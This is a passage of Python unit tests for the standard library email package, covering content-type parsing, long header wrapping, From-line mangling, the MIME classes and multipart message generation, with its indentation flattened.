def test_get_content_subtype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_subtype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_maintype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_replace_header(self):
eq = self.assertEqual
msg = Message()
msg.add_header('First', 'One')
msg.add_header('Second', 'Two')
msg.add_header('Third', 'Three')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Two', 'Three'])
msg.replace_header('Second', 'Twenty')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Twenty', 'Three'])
msg.add_header('First', 'Eleven')
msg.replace_header('First', 'One Hundred')
eq(msg.keys(), ['First', 'Second', 'Third', 'First'])
eq(msg.values(), ['One Hundred', 'Twenty', 'Three', 'Eleven'])
self.assertRaises(KeyError, msg.replace_header, 'Fourth', 'Missing')
def test_broken_base64_payload(self):
x = 'AwDp0P7//y6LwKEAcPa/6Q=9'
msg = Message()
msg['content-type'] = 'audio/x-midi'
msg['content-transfer-encoding'] = 'base64'
msg.set_payload(x)
self.assertEqual(msg.get_payload(decode=True), x)
# Test the email.encoders module
class TestEncoders(unittest.TestCase):
def test_encode_empty_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg['content-transfer-encoding'], '7bit')
    def test_default_cte(self):
        eq = self.assertEqual
        # With no explicit _charset it's us-ascii, and all are 7-bit
msg = MIMEText('hello world')
eq(msg['content-transfer-encoding'], '7bit')
# Similar, but with 8-bit data
msg = MIMEText('hello \xf8 world')
eq(msg['content-transfer-encoding'], '8bit')
# And now with a different charset
msg = MIMEText('hello \xf8 world', _charset='iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
# Test long header wrapping
class TestLongHeaders(TestEmailBase):
def test_split_long_continuation(self):
eq = self.ndiffAssertEqual
msg = email.message_from_string("""\
Subject: bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text
test
""")
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text
test
""")
def test_another_long_almost_unsplittable_header(self):
eq = self.ndiffAssertEqual
hstr = """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text""")
h = Header(hstr)
eq(h.encode(), """\
bug demonstration
12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
more text""")
def test_long_nonstring(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g, header_name='Subject')
h.append(cz_head, cz)
h.append(utf8_head, utf8)
msg = Message()
msg['Subject'] = h
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: =?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=
""")
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=""")
def test_long_header_encode(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_long_header_encode_with_tab_continuation(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit',
continuation_ws='\t')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
\tspooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_header_splitter(self):
eq = self.ndiffAssertEqual
msg = MIMEText('')
# It'd be great if we could use add_header() here, but that doesn't
# guarantee an order of the parameters.
msg['X-Foobar-Spoink-Defrobnit'] = (
'wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), '''\
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Foobar-Spoink-Defrobnit: wasnipoop; giraffes="very-long-necked-animals";
\tspooge="yummy"; hippos="gargantuan"; marshmallows="gooey"
''')
def test_no_semis_header_splitter(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = 'test@dom.ain'
msg['References'] = SPACE.join(['<%d@dom.ain>' % i for i in range(10)])
msg.set_payload('Test')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
From: test@dom.ain
References: <0@dom.ain> <1@dom.ain> <2@dom.ain> <3@dom.ain> <4@dom.ain>
\t<5@dom.ain> <6@dom.ain> <7@dom.ain> <8@dom.ain> <9@dom.ain>
Test""")
def test_no_split_long_header(self):
eq = self.ndiffAssertEqual
hstr = 'References: ' + 'x' * 80
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
References: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx""")
def test_splitting_multiple_long_lines(self):
eq = self.ndiffAssertEqual
hstr = """\
from babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
from babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)""")
def test_splitting_first_line_only_is_long(self):
eq = self.ndiffAssertEqual
hstr = """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93] helo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor test@mems-exchange.org; Wed, 28 Aug 2002 11:25:20 -0400"""
h = Header(hstr, maxlinelen=78, header_name='Received',
continuation_ws='\t')
eq(h.encode(), """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93]
\thelo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor test@mems-exchange.org; Wed, 28 Aug 2002 11:25:20 -0400""")
def test_long_8bit_header(self):
eq = self.ndiffAssertEqual
msg = Message()
h = Header('Britische Regierung gibt', 'iso-8859-1',
header_name='Subject')
h.append('gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte')
msg['Subject'] = h
eq(msg.as_string(), """\
Subject: =?iso-8859-1?q?Britische_Regierung_gibt?= =?iso-8859-1?q?gr=FCnes?=
=?iso-8859-1?q?_Licht_f=FCr_Offshore-Windkraftprojekte?=
""")
def test_long_8bit_header_no_charset(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['Reply-To'] = 'Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <a-very-long-address@example.com>'
eq(msg.as_string(), """\
Reply-To: Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <a-very-long-address@example.com>
""")
def test_long_to_header(self):
eq = self.ndiffAssertEqual
to = '"Someone Test #A" <someone@eecs.umich.edu>,<someone@eecs.umich.edu>,"Someone Test #B" <someone@umich.edu>, "Someone Test #C" <someone@eecs.umich.edu>, "Someone Test #D" <someone@eecs.umich.edu>'
msg = Message()
msg['To'] = to
eq(msg.as_string(0), '''\
To: "Someone Test #A" <someone@eecs.umich.edu>, <someone@eecs.umich.edu>,
\t"Someone Test #B" <someone@umich.edu>,
\t"Someone Test #C" <someone@eecs.umich.edu>,
\t"Someone Test #D" <someone@eecs.umich.edu>
''')
def test_long_line_after_append(self):
eq = self.ndiffAssertEqual
s = 'This is an example of string which has almost the limit of header length.'
h = Header(s)
h.append('Add another line.')
eq(h.encode(), """\
This is an example of string which has almost the limit of header length.
Add another line.""")
def test_shorter_line_with_append(self):
eq = self.ndiffAssertEqual
s = 'This is a shorter line.'
h = Header(s)
h.append('Add another sentence. (Surprise?)')
eq(h.encode(),
'This is a shorter line. Add another sentence. (Surprise?)')
def test_long_field_name(self):
eq = self.ndiffAssertEqual
fn = 'X-Very-Very-Very-Long-Header-Name'
gs = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
h = Header(gs, 'iso-8859-1', header_name=fn)
# BAW: this seems broken because the first line is too long
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_?=
=?iso-8859-1?q?ein_werden_mit_einem_Foerderband_komfortabel_den_Korridor_?=
=?iso-8859-1?q?entlang=2C_an_s=FCdl=FCndischen_Wandgem=E4lden_vorbei=2C_g?=
=?iso-8859-1?q?egen_die_rotierenden_Klingen_bef=F6rdert=2E_?=""")
def test_long_received_header(self):
h = 'from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by hrothgar.la.mastaler.com (tmda-ofmipd) with ESMTP; Wed, 05 Mar 2003 18:10:18 -0700'
msg = Message()
msg['Received-1'] = Header(h, continuation_ws='\t')
msg['Received-2'] = h
self.assertEqual(msg.as_string(), """\
Received-1: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
\throthgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
\tWed, 05 Mar 2003 18:10:18 -0700
Received-2: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
\throthgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
\tWed, 05 Mar 2003 18:10:18 -0700
""")
def test_string_headerinst_eq(self):
h = '<15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de> (David Bremner\'s message of "Thu, 6 Mar 2003 13:58:21 +0100")'
msg = Message()
msg['Received-1'] = Header(h, header_name='Received-1',
continuation_ws='\t')
msg['Received-2'] = h
self.assertEqual(msg.as_string(), """\
Received-1: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
\t(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
Received-2: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
\t(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
""")
def test_long_unbreakable_lines_with_continuation(self):
eq = self.ndiffAssertEqual
msg = Message()
t = """\
iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp"""
msg['Face-1'] = t
msg['Face-2'] = Header(t, header_name='Face-2')
eq(msg.as_string(), """\
Face-1: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
\tlocQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
Face-2: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
""")
def test_another_long_multiline_header(self):
eq = self.ndiffAssertEqual
m = '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with Microsoft SMTPSVC(5.0.2195.4905);
\tWed, 16 Oct 2002 07:41:11 -0700'''
msg = email.message_from_string(m)
eq(msg.as_string(), '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with
\tMicrosoft SMTPSVC(5.0.2195.4905); Wed, 16 Oct 2002 07:41:11 -0700
''')
def test_long_lines_with_different_header(self):
eq = self.ndiffAssertEqual
h = """\
List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>"""
msg = Message()
msg['List'] = h
msg['List'] = Header(h, header_name='List')
eq(msg.as_string(), """\
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
\t<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>
""")
# Test mangling of "From " lines in the body of a message
class TestFromMangling(unittest.TestCase):
def setUp(self):
self.msg = Message()
self.msg['From'] = 'aaa@bbb.org'
self.msg.set_payload("""\
From the desk of A.A.A.:
Blah blah blah
""")
def test_mangled_from(self):
s = StringIO()
g = Generator(s, mangle_from_=True)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: aaa@bbb.org
>From the desk of A.A.A.:
Blah blah blah
""")
def test_dont_mangle_from(self):
s = StringIO()
g = Generator(s, mangle_from_=False)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: aaa@bbb.org
From the desk of A.A.A.:
Blah blah blah
""")
# Test the basic MIMEAudio class
class TestMIMEAudio(unittest.TestCase):
def setUp(self):
# Make sure we pick up the audiotest.au that lives in email/test/data.
# In Python, there's an audiotest.au living in Lib/test but that isn't
# included in some binary distros that don't include the test
# package. The trailing empty string on the .join() is significant
# since findfile() will do a dirname().
datadir = os.path.join(os.path.dirname(landmark), 'data', '')
fp = open(findfile('audiotest.au', datadir), 'rb')
try:
self._audiodata = fp.read()
finally:
fp.close()
self._au = MIMEAudio(self._audiodata)
def test_guess_minor_type(self):
self.assertEqual(self._au.get_content_type(), 'audio/basic')
def test_encoding(self):
payload = self._au.get_payload()
self.assertEqual(base64.decodestring(payload), self._audiodata)
def test_checkSetMinor(self):
au = MIMEAudio(self._audiodata, 'fish')
self.assertEqual(au.get_content_type(), 'audio/fish')
def test_add_header(self):
eq = self.assertEqual
unless = self.failUnless
self._au.add_header('Content-Disposition', 'attachment',
filename='audiotest.au')
eq(self._au['content-disposition'],
'attachment; filename="audiotest.au"')
eq(self._au.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'audiotest.au')])
eq(self._au.get_param('filename', header='content-disposition'),
'audiotest.au')
missing = []
eq(self._au.get_param('attachment', header='content-disposition'), '')
unless(self._au.get_param('foo', failobj=missing,
header='content-disposition') is missing)
# Try some missing stuff
unless(self._au.get_param('foobar', missing) is missing)
unless(self._au.get_param('attachment', missing,
header='foobar') is missing)
# Test the basic MIMEImage class
class TestMIMEImage(unittest.TestCase):
def setUp(self):
fp = openfile('PyBanner048.gif')
try:
self._imgdata = fp.read()
finally:
fp.close()
self._im = MIMEImage(self._imgdata)
def test_guess_minor_type(self):
self.assertEqual(self._im.get_content_type(), 'image/gif')
def test_encoding(self):
payload = self._im.get_payload()
self.assertEqual(base64.decodestring(payload), self._imgdata)
def test_checkSetMinor(self):
im = MIMEImage(self._imgdata, 'fish')
self.assertEqual(im.get_content_type(), 'image/fish')
def test_add_header(self):
eq = self.assertEqual
unless = self.failUnless
self._im.add_header('Content-Disposition', 'attachment',
filename='dingusfish.gif')
eq(self._im['content-disposition'],
'attachment; filename="dingusfish.gif"')
eq(self._im.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'dingusfish.gif')])
eq(self._im.get_param('filename', header='content-disposition'),
'dingusfish.gif')
missing = []
eq(self._im.get_param('attachment', header='content-disposition'), '')
unless(self._im.get_param('foo', failobj=missing,
header='content-disposition') is missing)
# Try some missing stuff
unless(self._im.get_param('foobar', missing) is missing)
unless(self._im.get_param('attachment', missing,
header='foobar') is missing)
# Test the basic MIMEApplication class
class TestMIMEApplication(unittest.TestCase):
def test_headers(self):
eq = self.assertEqual
msg = MIMEApplication('\xfa\xfb\xfc\xfd\xfe\xff')
eq(msg.get_content_type(), 'application/octet-stream')
eq(msg['content-transfer-encoding'], 'base64')
def test_body(self):
eq = self.assertEqual
bytes = '\xfa\xfb\xfc\xfd\xfe\xff'
msg = MIMEApplication(bytes)
eq(msg.get_payload(), '+vv8/f7/')
eq(msg.get_payload(decode=True), bytes)
# Test the basic MIMEText class
class TestMIMEText(unittest.TestCase):
def setUp(self):
self._msg = MIMEText('hello there')
def test_types(self):
eq = self.assertEqual
unless = self.failUnless
eq(self._msg.get_content_type(), 'text/plain')
eq(self._msg.get_param('charset'), 'us-ascii')
missing = []
unless(self._msg.get_param('foobar', missing) is missing)
unless(self._msg.get_param('charset', missing, header='foobar')
is missing)
def test_payload(self):
self.assertEqual(self._msg.get_payload(), 'hello there')
self.failUnless(not self._msg.is_multipart())
def test_charset(self):
eq = self.assertEqual
msg = MIMEText('hello there', _charset='us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
# Test complicated multipart/* messages
class TestMultipart(TestEmailBase):
def setUp(self):
fp = openfile('PyBanner048.gif')
try:
data = fp.read()
finally:
fp.close()
container = MIMEBase('multipart', 'mixed', boundary='BOUNDARY')
image = MIMEImage(data, name='dingusfish.gif')
image.add_header('content-disposition', 'attachment',
filename='dingusfish.gif')
intro = MIMEText('''\
Hi there,
This is the dingus fish.
''')
container.attach(intro)
container.attach(image)
container['From'] = 'Barry <barry@digicool.com>'
container['To'] = 'Dingus Lovers <cravindogs@cravindogs.com>'
container['Subject'] = 'Here is your dingus fish'
now = 987809702.54848599
timetuple = time.localtime(now)
if timetuple[-1] == 0:
tzsecs = time.timezone
else:
tzsecs = time.altzone
if tzsecs > 0:
sign = '-'
else:
sign = '+'
tzoffset = ' %s%04d' % (sign, tzsecs / 36)
container['Date'] = time.strftime(
'%a, %d %b %Y %H:%M:%S',
time.localtime(now)) + tzoffset
self._msg = container
self._im = image
self._txt = intro
def test_hierarchy(self):
# convenience
eq = self.assertEqual
unless = self.failUnless
raises = self.assertRaises
# tests
m = self._msg
unless(m.is_multipart())
eq(m.get_content_type(), 'multipart/mixed')
eq(len(m.get_payload()), 2)
raises(IndexError, m.get_payload, 2)
m0 = m.get_payload(0)
m1 = m.get_payload(1)
unless(m0 is self._txt)
unless(m1 is self._im)
eq(m.get_payload(), [m0, m1])
unless(not m0.is_multipart())
unless(not m1.is_multipart())
def test_empty_multipart_idempotent(self):
text = """\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--
"""
msg = Parser().parsestr(text)
self.ndiffAssertEqual(text, msg.as_string())
def test_no_parts_in_a_multipart_with_none_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--''')
def test_no_parts_in_a_multipart_with_empty_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = ''
outer.epilogue = ''
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--
''')
def test_one_part_in_a_multipart(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.set_boundary('BOUNDARY')
msg = MIMEText('hello world')
outer.attach(msg)
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_empty_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_none_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_none_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_empty_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_nl_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = '\n'
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_message_external_body(self):
eq = self.assertEqual
msg = self._msgobj('msg_36.txt')
eq(len(msg.get_payload()), 2)
msg1 = msg.get_payload(1)
eq(msg1.get_content_type(), 'multipart/alternative')
eq(len(msg1.get_payload()), 2)
for subpart in msg1.get_payload():
eq(subpart.get_content_type(), 'message/external-body')
eq(len(subpart.get_payload()), 1)
subsubpart = subpart.get_payload(0)
eq(subsubpart.get_content_type(), 'text/plain')
def test_double_boundary(self):
        # msg_37.txt is a multipart that contains two dash-boundaries in a
# row. Our interpretation of RFC 2046 calls for ignoring the second
# and subsequent boundaries.
